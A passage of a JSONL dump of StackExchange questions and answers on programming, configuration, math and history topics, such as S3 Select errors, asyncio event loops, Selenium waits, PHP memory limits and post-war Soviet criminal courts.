count=%{y}<\/extra>',\n 'legendgroup': '',\n 'marker': {'color': '#636efa'},\n 'name': '',\n 'offsetgroup': '',\n 'orientation': 'v',\n 'showlegend': False,\n 'type': 'histogram',\n 'x': array([0.67, 0.68, 0.68, ..., 2.41, 2.48, 2.01]),\n 'xaxis': 'x',\n 'yaxis': 'y'}],\n'layout': {'barmode': 'relative',\n 'legend': {'tracegroupgap': 0},\n 'template': '...',\n 'title': {'text': 'Percent Histogram of TDD%'},\n 'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'title': {'text': 'Total Demand Distortion TDD %'}},\n 'yaxis': {'anchor': 'x', 'domain': [0.0, 1.0], 'title': {'text': 'count'}, 'type': 'log'}}\n<\/code>\nNow I can clearly see that to change this, I do a\ntdd_hist.layout.yaxis.title.text = 'Percent'\n<\/code>\nAnd it works!\nComment: This just changes the title of the yaxis, and has nothing to do with the question asked\n","meta":{"source":"stackoverflow","title":"Plotly: How to add text labels to a histogram?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fix \"MissingHeaders\" Error while appending where clause with s3 select\n\nQuestion: I have a csv file in the format\nIDATE_TIMESTAMP,OPEN,HIGH,LOW,CLOSE,VOLUME\n1535535060,94.36,94.36,94.36,94.36,1\n1535535120,94.36,94.36,93.8,93.8,1\n1535535180,93.8,93.8,93.8,93.8,0\n1535535240,93.8,93.8,93.74,93.74,1\n1535535300,93.74,93.74,93.74,93.74,0\n1535535360,93.74,93.74,93.74,93.74,0\n1535535420,93.74,93.74,93.74,93.74,0\n1535535480,93.74,93.74,93.74,93.74,0\n1535535540,93.74,93.74,93.74,93.74,0\n.\n.\n.\n.\n<\/code>\nI have to and from timestamp which will filter out the data from the file and return the output. I am using python + boto3 for s3 select. \nfromTs = \"1535535480\"\ntoTs = \"1535535480\"\nquery = \"\"\"SELECT * FROM s3object s WHERE s.\"IDATE_TIMESTAMP\" >= \"%s\" AND s.\"IDATE_TIMESTAMP\" <= \"%s\" \"\"\"%(fromTs, toTs)\nrequest = client.select_object_content(\n Bucket=bucket,\n Key=filename,\n ExpressionType=\"SQL\",\n Expression=query,\n InputSerialization={\"CSV\":{\"FileHeaderInfo\":\"Use\", \"FieldDelimiter\":\",\", \"RecordDelimiter\":\"\\n\"}},\n OutputSerialization={\"CSV\":{}},\n )\n<\/code>\nbotocore.exceptions.ClientError: An error occurred (MissingHeaders) when calling the SelectObjectContent operation: Some headers in the query are missing from the file. Please check the file and try again.\nThis is error i am getting\nAnswer: I know this is a bit late and might not be the solution to your issue, but I was having a similar one.\nMy issue turned out to be that I was attempting to perform an S3 Select on an object with UTF-8-BOM encoding, rather than just UTF-8. It turns out that the 3 byte BOM header was being interpreted as part of the first field in the CSV object, essentially corrupting the first column name.\nAs a result, rather than \"IDATE_TIMESTAMP\", the first column would be seen by the S3 Select call as \"xxxIDATE_TIMESTAMP\", causing an error when your expected column is \"missing\".\nAnswer: The timestamp columns need to be casted as int.\nThe following query:\nfromTs = 1535535480\ntoTs = 1535535480\n<\/code>\nSELECT * FROM s3object s \nwhere cast(s.IDATE_TIMESTAMP as int) >= {} \nAND cast(s.IDATE_TIMESTAMP as int) <= {}\".format(fromTs, toTs) \n<\/code>\nwould work in python 3.\n","meta":{"source":"stackoverflow","title":"How to fix \"MissingHeaders\" Error while appending where clause with s3 select","dup_signals":{}},"subset":"stackexchange"} +{"text":"Elliptic curve representation\n\nQuestion: According to this page, Edward's curve point doubling can be represented in a different way by assuming $c=1$ and $d = r^2$.\nIt then says we can represent $x y$ as $Y Z$ satisfying $r\\cdot y = \\frac Y Z$\nI am a bit confused. How would I then calculate the $x$ coordinate? For example, they have provided the following explicit formula:\nYY = Y12\nZZ = r*Z12\nV = s*(ZZ-YY)2\nW = (ZZ+YY)2\nY3 = W-V\nZ3 = W+V\n<\/code>\nSo after obtaining $Y_3$ and $Z_3$, how would I revert back to affine coordinates and calculate $x$ and $y$?\nAnswer: When $c=1$ and $d = r^2$, an Edwards curve $x^2+y^2=c^2(1+dx^2y^2)$ becomes $$x^2+y^2=1+r^2x^2y^2 \\iff x^2(1-r^2 y^2) = 1 - y^2$$\nWith the $(Y,Z)$ notation, a point $P = (x,y)$ is represented as a pair $(Y:Z)$ satisfying $ry = Y\/Z$. Note that this representation does not allow to distinguish $P = (x,y)$ from $-P = (-x,y)$. \nGiven a pair $(Y:Z)$, one can recover $\\pm P = (\\pm x, y)$ where $y = Y\/(rZ)$ and $\\pm x$ is the square root of $(1-y^2)\/(1-r^2y^2)$.\nComment: I don't think this is the simplest way. For Montgomery or Brier-Joye ladders there is a way to compute the $y$ coordinate given the addition formula and some equations that holds (which for ladders is the fact that the difference of the two internal points is the base point). I imagine the same could apply here to avoid the heavy square root.\nComment: @Ruggero: This is another setting. Define $(x_k,y_k) = [k]P$. Using Montgomery-like ladders, you'll get $(Y_k:Z_k)$ and $(Y_{k+1}:Z_{k+1})$. It is then possible to recover $(x_k,y_k)$ without computing a square root but this requires the knowledge of $P=(x,y)$.\nComment: Are you saying that ponzi34 lacked the original $x$ coordinate ? I would doubt that.\n","meta":{"source":"crypto.stackexchange","title":"Elliptic curve representation","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fetch data from IndexedDB in Angular2\n\nQuestion: Anyone knows about Angular2 IndexedDb.Please help me.\nI have a json response like this.\n{\n \"response\": {\n \"data\": {\n \"name\": \"ABC\",\n \"Id\": \"1234\",\n \"address\": \"adthhyrr\" \n }\n }\n}\n<\/code>\nI am saving this response to IndexedDB. But i am facing problem while fetching data from indexedDB.\nI am following this example.https:\/\/github.com\/robisim74\/angular2indexedDB\nIn the service file am doing like this to get data.\n getAllData(): any { \n\n return new Promise(resolve => \n {\n this.indexedDB.openDBAsync(\"Angular2IndexedDB\", 1).forEach(\n\n (readyState: string) => {\n\n console.log('IndexedDB service: opening db: ' + readyState);\n\n }, null\n\n ).then(\n\n () => {\n\n \/\/ Gets all records from \"Table\".\n this.indexedDB.getAllRecordsAsync(\"Login\").forEach(\n\n \/\/ Next.\n (record: Todo) => {\n if (record != null) {\n this.indexeddb_data = JSON.parse(record.description);\n console.log('data'+this.indexeddb_data);\n \/\/here am getting data in this.indexeddb_data.In console i am getting.\n return this.indexeddb_data;\n }\n }, null\n\n ).then(() => {\n\n resolve(true);\n return this.indexeddb_data;\n\n });\n\n });\n });\n }\n<\/code>\nBut it is not returning anything.Can anyone please me how to do this.Or any other method is there to fetch data from IndexedDB?\nAnswer: Where you're referencing \"this.indexedDB\", the author of the linked code actually has functions on his service object that handle the \"openDBAsync\" functionality and the getAllRecordsAsync functionality. They're not functions on the indexedDB object. So, if you've declared functions on your service like he has or are importing them from some other service, then you should reference them in the correct way. If they're declared directly on the service class, then just say \"this.openDBAsync('some_name', 1)\" instead of how you've done it. And if you're importing these functions from some other file, then just call them directly like this \"openDBAsync('some_name', 1)\".\nAlso, take a look at the indexedDB api to make sure you have the available methods down, so you don't get tripped up. https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/IndexedDB_API\n","meta":{"source":"stackoverflow","title":"Fetch data from IndexedDB in Angular2","dup_signals":{}},"subset":"stackexchange"} +{"text":"Running asynchronous code synchronously in separate thread\n\nQuestion: I'm using Django Channels to support websockets and am using their concept of a group to broadcast messages to multiple consumers in the same group. In order to send messages outside of a consumer, you need to call asynchronuous methods in otherwise synchronous code. Unfortunately, this is presenting problems when testing. \nI began by using loop.run_until_complete<\/code>:\nloop = asyncio.get_event_loop()\nloop.run_until_complete(asyncio.ensure_future(channel_layer.group_send(group_name, {'text': json.dumps(message),\n 'type': 'receive_group_json'}),\n loop=loop))\n<\/code>\nThen the stacktrace read that the thread did not have an event loop: RuntimeError: There is no current event loop in thread 'Thread-1'.<\/code>. To solve this, I added:\nloop = asyncio.new_event_loop()\nasyncio.set_event_loop(loop)\nloop.run_until_complete(asyncio.ensure_future(channel_layer.group_send(group_name, {'text': json.dumps(message),\n 'type': 'receive_group_json'}),\n loop=loop))\n<\/code>\nAnd now the stacktrace is reading the RuntimeError: Event loop is closed<\/code>, although if I add print statements loop.is_closed()<\/code> prints False<\/code>.\nFor context, I'm using Django 2.0, Channels 2, and a redis backend.\nUpdate: I tried running this in a Python interpreter (outside of py.test to remove moving variables). When I ran the second code block, I did not get an Event loop is closed<\/code> error (that may be due to something on Pytest's end whether its timeouts, etc). But, I did not receive the group message in my client. I did, however, see a print statement:\n({ result=None>}, set())\n<\/code>\nUpdate 2: After flushing redis, I added a fixture in py.test to flush it for every function as well as a session-scoped event loop. This time yielding yet another print from RedisChannelLayer:\n({ exception=RuntimeError('Task > got Future attached to a different loop',)>}, set())\n<\/code>\nAnswer: If channel_layer<\/code> expects to reside in its own event loop in another thread, you will need to get a hold of that event loop object. Once you have it, you can submit coroutines to it and synchronize with your thread, like this:\ndef wait_for_coro(coro, loop):\n # submit coroutine to the event loop in the other thread\n # and wait for it to complete\n future = asyncio.run_coroutine_threadsafe(coro, loop)\n return future.wait()\n\nwait_for_coro(channel_layer.group_send(group_name, ...), channel_loop)\n<\/code>\nComment: What's the standard practice for passing the event loop between threads? Do I need to pass the event loop as an argument into the worker thread? Or is there a call in the daphne or async lib?\nComment: @williamrfry Since the event loop is an object like any other, passing `asyncio.get_event_loop()` an argument to the worker thread is perfectly fine. The only thing to remember is that you're not allowed to *do* anything with that event loop in the worker thread (e.g. submit tasks or query its state), except through `asyncio.run_coroutine_threadsafe`.\nAnswer: By default, only the main thread gets an event loop and calling get_event_loop<\/code> in other threads will fail. \nIf you need an event loop in another thread -- such as a thread handling an HTTP or WebSockets request -- you need to make it yourself with new_event_loop<\/code>. After that you can use set_event_loop<\/code> and future get_event_loop<\/code> calls will work. I do this:\n# get or create an event loop for the current thread\ndef get_thread_event_loop():\n try:\n loop = asyncio.get_event_loop() # gets previously set event loop, if possible\n except RuntimeError:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n return loop\n<\/code>\nMore here.\n","meta":{"source":"stackoverflow","title":"Running asynchronous code synchronously in separate thread","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can we pass in an ExpectedConditions as a parameter to wait.until in Selenium Java?\n\nQuestion: I'm finding trouble passing in an ExpectedConditions<\/code> as a parameter in a method to wait.until()<\/code>. The wait.until()<\/code> expects a function to be passed in. I am relatively new to Java, and would appreciate the assistance.\nOffending code:\npublic void waitUntil(WebElement element, long seconds, String errorMessage, ExpectedConditions expectedConditions) {\n if (seconds == 0 || errorMessage.isEmpty()) throw new IllegalArgumentException();\n WebDriverWait wait = new WebDriverWait(driver, Duration.ofSeconds(seconds));\n wait.withMessage(errorMessage);\n \/\/ this throws a compiler error.\n wait.until(expectedConditions);\n}\n<\/code>\nwait.until()<\/code> expects a function to be passed into it, which looks like ExpectedConditions.urlToBe(\"http:\/\/www.test.com\")<\/code>.\nI am trying to make a method that could be called where any ExpectedCondition i.e. urlToBe, alertIsPresent etc.. could be passed in.\nThank you.\nComment: Just leave it as `?` . It is called wildcards: https:\/\/docs.oracle.com\/javase\/tutorial\/java\/generics\/wildcards.html\nComment: What does the compiler error says?\nComment: ```Required type: Function \nProvided: ExpectedConditions\n\nreason: no instance(s) of type variable(s) V exist so that ExpectedConditions conforms to Function```\nComment: What if you change the 4th parameter to: `ExpectedCondition expectedConditions`?\nComment: What type should the be?\nComment: I see, the compiler error has gone. Testing it now, will report back.\nAnswer: (WebElement element, long seconds, String errorMessage, ExpectedConditions expectedConditions)\n<\/code>\nIn first place, the type of expectedConditions<\/code> is wrong.\nYou declared it as ExpectedConditions<\/code>, which represents the util class.\nYou actually want ExpectedCondition<\/code>, the type which all methods from ExpectedConditions<\/code> returns.\nBut just changing it to ExpectedCondition<\/code> is not enough. Because you will receive an warning about Raw type<\/code>, because ExpectedCondition<\/code> is a generic class.\nSo you have to declare the type parameter of class, and because you want to include everything, you use wildcard ?<\/code>\nIn the final, the parameter should be ExpectedCondition expectedConditions<\/code>\nAnswer: WebDriverWait has a constructor that is overloaded to take long as a second args. You do not need to use Duration.ofSeconds(seconds)<\/code>\nAlso,\nThe method until(Function) in the type FluentWait is not applicable for the arguments (ExpectedConditions)\n<\/code>\nFix :\nYou should use expectedConditions with one the conjunction like\n\nelementToBeClickable\nvisibilityOfElement\n\nand so on..\nCode :\npublic void waitUntil(WebElement element, long seconds, String errorMessage, ExpectedConditions expectedConditions) {\n if (seconds == 0 || errorMessage.isEmpty()) throw new IllegalArgumentException();\n WebDriverWait wait = new WebDriverWait(driver, seconds);\n wait.withMessage(errorMessage);\n WebElement elemenet = wait.until(expectedConditions.elementToBeClickable(By.xpath(\"\/\/some xpath\")));\n }\n<\/code>\nInternal overloaded method :\n *\/\n public WebDriverWait(WebDriver driver, long timeOutInSeconds) {\n this(\n driver,\n java.time.Clock.systemDefaultZone(),\n Sleeper.SYSTEM_SLEEPER,\n timeOutInSeconds,\n DEFAULT_SLEEP_TIMEOUT);\n }\n<\/code>\nComment: The thing is, using ```long``` or ```int``` only is now deprecated, it has the @Deprecated annotation on it. Selenium authors want us to use the ```Duration.ofSeconds()``` as an argument.\nComment: @SilentKay : Which version you are on ?\nComment: Selenium 4.0.0.\n\nJust to add -> i'm aware you can use ```ExpectedConditions.urlToBe(url)``` and just pass the ```url``` into it. But that means i'll have to create a separate method for each condition. Whereas, I would rather prefer it to be generic, so I can pass in an ExpectedCondition object into the method, with any condition as the caller sees fit.\nAnswer: I don't see anythin wrong in your code block. However you need to ensure a couple of things as follows:\n\nWhhile using ExpectedConditions you have to make the following import:\nimport org.openqa.selenium.support.ui.ExpectedConditions;\n<\/code>\n\nAs you are using Selenium 4.0.0 you need to use guava-31.0.1-jre.jar<\/code>\nComment: Yes, I removed it for brevity reasons. But it is already there.\nComment: I'm not sure what \"guava\" has to do with passing a static method into a method to be called upon?\nComment: Cross check the guava version.\nComment: Seems you got a working and an Accepted answer. So I'll skip the explanation. Good Luck\n","meta":{"source":"stackoverflow","title":"How can we pass in an ExpectedConditions as a parameter to wait.until in Selenium Java?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Formula returns 'int' object is not iterable\n\nQuestion: Here is a code that gives an error:\nfrom math import sqrt \n\ndef normal(vector):\n sum = 0\n for i in vector:\n sum = sum + (i**2)\n norm = sqrt(sum)\n return round(norm, 4)\n\ndef innerproduct(vector_x, vector_y):\n sum = 0 \n for i in vector_x:\n for j in vector_y:\n sum = sum + (i*j)\n inner_product = sum\n return inner_product\n\ndef distance(vector_x, vector_y):\n distance = 0\n for i in vector_x:\n for j in vector_y:\n dist = normal(i)**2 + normal(j)**2 - (2*(innerproduct(i,j)))\n return sqrt(dist)\n<\/code>\nthe first two functions are working fine but the third one returns TypeError: 'int' object is not iterable.\nComment: Paste the full error message. And the code which calls the 3rd method.\nComment: Maybe you are calling `distance` with a int in argument, so there is an error in the for loop ?\nComment: TypeError (most recent call last)\n----> 1 print(\"distance(vector_x, vector_y):\", distance(vector_x, vector_y))\n in distance(vector_x, vector_y)\n 20 for i in vector_x:\n 21 for j in vector_y:\n---> 22 dist = int(normal(i)**2) + int(normal(j)**2) - (2*(innerproduct(i,j)))\n 23 return sqrt(dist)\nin normal(vector)\n 3 def normal(vector):\n 4 sum = 0\n----> 5 for i in vector:\n 6 sum = sum + (i**2)\n 7 norm = sqrt(sum)\n\nTypeError: 'int' object is not iterable\nAnswer: The error I got is :\nTraceback (most recent call last):\n File \"t.py\", line 25, in \n print(distance([1,2],[5,6]))\n File \"t.py\", line 22, in distance\n dist = normal(i)**2 + normal(j)**2 - (2*(innerproduct(i,j)))\n File \"t.py\", line 5, in normal\n for i in vector:\nTypeError: 'int' object is not iterable\n<\/code>\nBecause in your function normal<\/code>, you do a for loop on a int (vector<\/code>).\nComment: I tried to add in range(vector) to avoid this error, but it didn't work.\nComment: your vector variable is a int, you can't iterate on it, and you can't use `range` on it either. In your function `distance`, when you are calling `normal`, you put `i` in argument, it's a int from `vector_x`\nComment: so what is the possible solution?\nComment: Put vector_x instead of i when calling normal maybe, but I don't know about your formula\n","meta":{"source":"stackoverflow","title":"Formula returns 'int' object is not iterable","dup_signals":{}},"subset":"stackexchange"} +{"text":"Adding an image to a shape\n\nQuestion: So i'm learning to create a java game on eclipse. I learned adding shapes and such. I also learned how to paint the shapes (change the colours) I was wondering how to add an image to the shape. This is the code for painting the rectangle.\npublic void paintColumn(Graphics g, Rectangle column)\n {\n g.setColor(Color.blue.darker());\n g.fillRect(column.x, column.y, column.width, column.height);\n }\n<\/code>\nComment: `g.drawImage`? What do you mean by \"add to shape\"? Do you want to clip the image so it's the same shape as the shape? Or just draw the image within the shape?\nComment: I want the image to be inside the shape, but the shape having the same hit box.\nComment: You want to draw the same around the image then?\nComment: yeah that is what I want\nAnswer: Start by having a look at Reading\/Loading an Image for details about how to load a image, also, have a look at 2D Graphics for more details about 2D Graphics API.\nBasically, you load the image, you draw it and then draw the shape around it.\n\n Graphics2D g2d = (Graphics2D) g.create();\n int x = (getWidth() - img.getWidth()) \/ 2;\n int y = (getHeight() - img.getHeight()) \/ 2;\n g2d.drawImage(img, x, y, this);\n g2d.setColor(Color.RED);\n g2d.drawRect(x, y, img.getWidth(), img.getHeight());\n g2d.dispose();\n<\/code>\nNow, this just draws the rectangle over the image, if you want to, somehow \"frame\" the image instead, you could fill the rectangle, making it larger then the image, but you'd have to fill first, then draw the image\n\n Graphics2D g2d = (Graphics2D) g.create();\n int x = (getWidth() - img.getWidth()) \/ 2;\n int y = (getHeight() - img.getHeight()) \/ 2;\n g2d.setColor(Color.RED);\n g2d.fillRect(x - 10, y - 10, img.getWidth() + 20, img.getHeight() + 20);\n g2d.drawImage(img, x, y, this);\n g2d.dispose();\n<\/code>\nAnswer: Simply create a BufferedImage object:\nBufferedImage image = ImageIO.read(filename);\n<\/code>\nThen instead of doing g.drawShape do:\ng.drawImage(image, [starting x], [starting y], [image width], [image height], [image observer]);\n<\/code>\nIn your case, you probably won't need an image observer, so you can just put null<\/code> in that spot.\nThen what would be easiest is to just draw your rectangle on top of the image. Even though the image will not actually be \"inside\" the the rectangle, the layered effect will make it look as if it is. You can use drawRect<\/code> instead of fillRect<\/code> so you just get a border around your image.\nTo ensure that your rectangle ends up on top of the image, and doesn't get covered since the image is the same size, make sure to put the drawRect line after the drawImage.\ng.drawRect([starting x], [starting y], [width], [height]);\n<\/code>\nCheck out these Graphics Java Docs for more information on drawing images.\n","meta":{"source":"stackoverflow","title":"Adding an image to a shape","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is Mathematica unable to solve this integral equation?\n\nQuestion: How to solve the following integral equation in Mathematica?\neqn = y[x, z] == z + x*Integrate[y[t, v], {t, 0, 1}, {v, 0, 1}]\nsol = DSolveValue[eqn, y[x, z], {x, z}]\n<\/code>\nWhat is the problem?\nMathematica usually gives me answers like that while solving things that look difficult. I can solve simple problems. Difficult problems are why I need a software. Thank you in advance.\nComment: Please post your code, not a picture of it, so that readers can try to help you without having to transcribe it. Also, do yo9u have reason to believe that a symbolic solution actually exist?\nComment: @bbgodfrey I do not believe. I am seeing that it is not working. If it doesn't exist, why doesn't it give an error? or say \"it doesn't exist\"? If I knew the answer I wouldn't try in the first place.\nComment: In fact, Mathematica almost always returns unevaluated, when it cannot solve a problem. I agree that it should provide an explanation, but it does not. By the way, a solution to your second equation does exist, even thought Mathematica cannot find it. It is `x + z` .\nComment: @bbgodfrey Thank you so much. The actual equation I am trying to solve is more complicated than this but it has the same shape. I would be pleased if you could recommend me another software\/application.\nComment: Please post your code instead of picture.\nAnswer: Mathematica can solve your equation, but it requires some understanding of mathematics and human intervention. This is always the case for nontrivial problems, isn't it?\nAdditive solution was demonstrated by @bbgodfrey. But there is another multiplicative one. Separate variables as follows\n$$y(x,z)=g(x) h(z),$$\nand set\n$$G=\\int_0^1 g(x) dx.$$\nNow your equation reads after integrating it $\\int_0^1 dx\\ldots$\n$$\nG h(z)=z+\\frac{G}{2} \\int_0^1\\! h(v)\\, dv.\n$$\nThis equation can be solved with MA\neqn = G* h[z] == z + 1\/2* G*Integrate[h[v], {v, 0, 1}]\nDSolveValue[eqn, h[z], z]\n<\/code>\n$$h(z)=\\frac{2 z+1}{2 G}.$$\nThe full solution therefore reads\n$$y(x,z)=\\frac{(2 z+1)g(x)}{2 G},$$\nwhere $g(x)$ is arbitrary function on the $[0,1]$ interval such that $G=\\int_0^1 g(x) dx\\neq0$.\n","meta":{"source":"mathematica.stackexchange","title":"Why is Mathematica unable to solve this integral equation?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP Error - keep getting \"Out of memory error\"\n\nQuestion: I kept getting this error on one of the site Im working on\n\nMessage Out of memory (allocated 2097152) (tried to allocate 20480 bytes)\n\nand the thing is we already set the memory limit to 512MB, and seems weird that it says allocated 2097152 which is like only 2MB?\nThis site is running in wordpress with woocommerce, and the even woocommerce status says the memory limit is 512MB.\nCan anybody explain whats going on?\nServer is running on NGINX + PHP-FPM\nComment: It sounds like you might have an infinite loop somewhere. Please show us the code where the error message is thrown, or we won't have a clue what's going on.\nComment: Don't you see a path and a line number following the error?\nComment: Where are you getting this error? Are you doing anything special and getting this error.\nComment: Its throwing everywhere even in native wp files .e.g\n```Fatal Error\nLine 1333\nMessage Out of memory (allocated 6291456) (tried to allocate 114688 bytes)\nFile \/..\/..\/...\/wp-admin\/includes\/class-wp-list-table.php```\nComment: I could list 10-30 files showing on the log file from plugin or theme that produces this type of error.\nComment: my question here is why it says \"Out of memory (allocated 2097152)\" isn't that only 2MB? where as my memory limit is 512MB\nAnswer: Try set upload_max_filesize, post_max_size , max_file_uploads<\/code> and memory_limit<\/code> in php.ini<\/code> and then restart your Apache server. If it did not work, try to set the mentioned parameters to right on top of your code.\nBest way to increase memory limit in PHP or WordPress.\n\nVia php.ini file\n\nmemory_limit 2048M\npost_max_size 200M\nupload_max_filesize 20M\nmax_file_uploads 20\n<\/code>\n\nVia PHP script\n\nini_set('memory_limit','2048M');\nini_set('post_max_size','200M');\nini_set('upload_max_filesize','20M');\nini_set('max_file_uploads','20');\n<\/code>\n\nVia wp_config.php file in WordPress\n\ndefine('WP_MEMORY_LIMIT', '2048M');\n<\/code>\n\nVia htaccess\n\nphp_value memory_limit 256M\nphp_value post_max_size 200M\nphp_value upload_max_filesize 20M\nphp_value max_file_uploads 20\n<\/code>\nComment: if you read my question, I mention its running NGINX + PHP-FPM\nComment: Can you please check free memeory on server please? Try this command to check `free -m` and let me know\nComment: You can also contact server provider to solve the issue related to server. They have issue solutions. They will suggest good things too.\nAnswer: In wp-config file Update the memory limit according to your need \ndefine('WP_MEMORY_LIMIT', '256m');\ndefine('WP_MAX_MEMORY_LIMIT', '512m');\n<\/code>\n","meta":{"source":"stackoverflow","title":"PHP Error - keep getting \"Out of memory error\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Analyse TypeScript SonarQube in Maven project\n\nQuestion: I'll try to use the SonarQube SonarTS plugin to analyse TypeScript files in a project of mine.\nIt contains a submodule that contains some images, some xmls, and a couple of .ts-files. I have installed SonarTS ( https:\/\/docs.sonarqube.org\/display\/PLUG\/SonarTS ) in SonarQube. The project uses typescript 2.4.2 as a devDependency and is build with Node 6.13.1.\nWhen I call mvn sonar:sonar -Dsonar.branch=<\/code> (I know sonar.branch is deprecated, I'll fix soon :)), eventually the sum-module is scanned and this is the log:\n[INFO] ------------- Scan MyProject\n[INFO] Base dir: \/home\/jenkins\/workspace\/my-project\/my-project-config-model\n[INFO] Working dir: \/home\/jenkins\/workspace\/my-project\/my-project-config-model\/target\/sonar\n[INFO] Source paths: pom.xml\n[INFO] Source encoding: UTF-8, default locale: en_US\n[INFO] Index files\n[INFO] 1 file indexed\n[INFO] Quality profile for xml: Sonar way\n[INFO] Sensor Embedded CSS Analyzer Sensor [css]\n[INFO] 0 source files to be analyzed\n[INFO] Sensor Embedded CSS Analyzer Sensor [css] (done) | time=1ms\n[INFO] Sensor SonarJavaXmlFileSensor [java]\n[INFO] 0\/0 source files have been analyzed\n[INFO] 1 source files to be analyzed\n[INFO] Sensor SonarJavaXmlFileSensor [java] (done) | time=31ms\n[INFO] 1\/1 source files have been analyzed\n[INFO] Sensor XML Sensor [xml]\n[INFO] Sensor XML Sensor [xml] (done) | time=8ms\n[INFO] SCM provider for this project is: git\n[INFO] 1 files to be analyzed\n[INFO] 0\/1 files analyzed\n<\/code>\nAnd the only file that is scanned is the pom.xml\nCould it have something to do with the structure of the sub-module? The xmls and ts files are not at src\/main\/{ts|resources}<\/code>, but src\/models<\/code> and src\/scripts<\/code>.\nThanks in advance!\nAnswer: I guess you need to change the sonar.sources<\/code> parameter to include your source folders (something like sonar.sources=src\/main\/java,src\/models,src\/scripts<\/code> should work).\nYou can find more about analysis parameters here, and more about the way to configure the maven scanner here.\nComment: Thank you very much! Have seen that in some examples, but haven't found the info, that if empty the default maven values are used. Thanks!\n","meta":{"source":"stackoverflow","title":"Analyse TypeScript SonarQube in Maven project","dup_signals":{}},"subset":"stackexchange"} +{"text":"ubuntu server does not function in gui mode\n\nQuestion: Prior to downloading the server- ubuntu desktop. I verified connectivity. I see a CD\/ROM on the E: drive. this is new. I go by the recommended procedure of VHD in SCSI and don't know where to go to CD\/ROM, scsi, ide, nvme? really it is like rocket science.\nI installed server before and it was a beauty with GUI. I had to change my SSD to bigger one on the computer. I installed windows server, debian package, REHL, and even ubuntu desktop. But server does not give me connection to the network. It is just a morroon shell that is dead.\nComment: yes, gui on server. The Ubuntu Gui desktop is what I want. release is 18.04.2. I go to -sudo apt install tasksel, then click on ubuntu desktop, ok, then sudo reboot. once there, I see a blank shell moroon color, just like the desktop. no lights, nothing. just dead\nComment: i already installed kali and the ubuntu desktop and had no problems, installed vmware tools that makes it just like my windows 10 experience. But the server installation is fine all the way to the point where it leads off to the GUI. Then goes dead. I had connectivity and could do everything pretty much in the command line.\nAnswer: sudo apt install --reinstall ubuntu-desktop gnome-shell\n<\/code>\nPackage name has changed since 17.10 and by the way a server has no gui.\n","meta":{"source":"askubuntu","title":"ubuntu server does not function in gui mode","dup_signals":{}},"subset":"stackexchange"} +{"text":"How did a criminal trial in the Soviet Union work after World War 2?\n\nQuestion: There are many historical accounts of \"trials\" in the Soviet Union. However, they tend to center around trials which are political trials. For example, a government agent accused of treason.\nHow did a criminal trial in the Soviet Union work? Specifically I am interested in the time immediately after World War 2.\nComment: You might need to be more specific timewise. The period 'immediately after' WW2 is still under Stalin, and it seems that *all trials* were political trials. Stealing a handful of grain could make you an enemy of the state.\nComment: @user2448131 Maybe that is the answer in itself. You could submit an answer about how even the smallest offenses in society were elevated to the level of severe crimes against the state apparatus.\nComment: [\u0414\u0438\u043d\u0430 \u041a\u0430\u043c\u0438\u043d\u0441\u043a\u0430\u044f \"\u0417\u0430\u043f\u0438\u0441\u043a\u0438 \u0430\u0434\u0432\u043e\u043a\u0430\u0442\u0430\"](http:\/\/imwerden.de\/pdf\/kaminskaya_zapiski_advokata_2009.pdf) contains 2 major episodes: a criminal and a political. The author was the defender in both cases. Breathtakingly interesting.\nAnswer: Criminal justice in USSR in the post war period was performed by \"People's Courts\" (they existed in 1937-1989). They consisted of judges and \"people's jury\". The judges were elected by popular vote for the term of 5 years. The jurors were elected for 2 years by meetings of \"labor collectives\" (factories an other enterprises). All elections in Soviet Union were strictly controlled by the Communist party, so usually 99.9% voted for a single candidate proposed by CPSU.\nThere was no such notion as \"independent court\", even in theory. The system of justice was \"a branch of the government\". In addition to this, aspects of life, all institutions in USSR, including the government and justice were strictly controlled by CPSU, and this was written into the constitution. \nSuperficially, the process looked as in democratic courts: there was an accuser and a defender, the judge presided and the jurors made decision by vote. In some cases the jurors were not used and the judge made the decision him\/her self.\nThere was also a variety of other courts, \"Camarade's courts\", tribunals, etc.\nBut the usual criminal cases were handled by the People's courts.\nIn the period immediately after WWII, enormous number of people were imprisoned in camps or exiled without any court hearings, for alleged \"collaboration with enemy\", or waging war against Soviet power. (Whole nations were deported, and\nother nations decimated). In most cases, the armed resistance against Soviet power was qualified simply as \"banditism\", but it was not handled by any courts.\nMost of the camps population in the late 40s consisted of these people, though the ordinary crime rates were also very high.\nTorture was not officially permitted after WWII, but in fact it was widely used.\nEven in 1980s, beating by police was a routine \"investigation procedure\". Very few people dared to complain.\nDeath penalty was abolished in 1947, but in 1950 it was re-introduced for \"spying and high treason\". 10 years later people were sentenced to death for\n\"illegal currency transactions\". So the state did not respect its own laws. But in any case, death penalty was very rare in comparison with 1930s. \nSee, for example, http:\/\/lawbook.online\/gosudarstva-prava\/organyi-yustitsii-sud-prokuratura-29805.html\nSorry, in Russian.\nComment: @Felix Goldberg: I disagree. The whole idea of \"separation of powers\" was totally foreign to Soviet system, even in theory. Justice was just a branch of the state. There was no authority except the state. This is why the system is called \"totalitarian\".\nComment: Can you provide any sources?\nComment: My answer was based on my own experience (I lived in USSR since the middle 50s till late 80s), on many Soviet books and newspapers that I read in this period, but you can check everything I said using Russian Wikipedia, or typing \"Criminal Justice in USSR\" on Google.\nComment: @Alex With due respect, I think you are wrong here. The judiciary is a branch of the state everywhere, by definition. The question is whether the executive branch can control the operation of the judiciary. There is no argument that in practice the Soviet courts were subservient to the party. But in theory, on the level of constitutional platitudes, the had about the same status as their counterparts in free countries.\nComment: +1 overall but I think you might be wrong on one point: the courts were considered independent *in theory*.\nComment: 6th article of constitution which guaranteed CPSU all control was introduced in 1977. It was not in the 1936 constitution.\nComment: @Alex I tracked it down for you. Article 112 of the 1936 Constitution says: \"\u0421\u0442\u0430\u0442\u044c\u044f 112. \u0421\u0443\u0434\u044c\u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b \u0438 \u043f\u043e\u0434\u0447\u0438\u043d\u044f\u044e\u0442\u0441\u044f 